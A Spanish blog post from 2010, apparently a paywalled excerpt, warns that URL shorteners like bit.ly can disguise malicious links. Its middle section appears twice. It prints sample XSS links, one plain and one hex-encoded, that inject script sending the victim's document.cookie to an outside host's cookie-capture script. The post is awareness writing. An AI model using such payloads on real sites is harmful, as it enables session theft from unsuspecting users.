El peligro de los acortadores de url's
Páginas: 3 (522 palabras)
Publicado: 26 de septiembre de 2010
Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales, se ha hecho muy comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util,ya que nos permiten acortar aquellas urls, que son demasiado largas y que son dificiles de recordar. Su uso es muy sencillo solo basta con entrar a un sitio de tantos en la red que nos dan esteservicio como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar damos click en el boton y listo tendremos nuestra url recortada, algo asi como esto:http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que algun individuo de forma malintencionada puede“camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos unejemplo, un informatico ve que una nena muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi?‘%20+document.cookie
o este:http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Para cualquier personacon sentido comun (bueno eso creo y espero) que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda. Pero que pasaria si se usa una web que nos recortala url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda...
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que algun individuo de forma malintencionada puede“camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos unejemplo, un informatico ve que una nena muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi?‘%20+document.cookie
o este:http://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63% 75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
Para cualquier personacon sentido comun (bueno eso creo y espero) que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda. Pero que pasaria si se usa una web que nos recortala url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda...
Leer documento completo
Regístrate para leer el documento completo.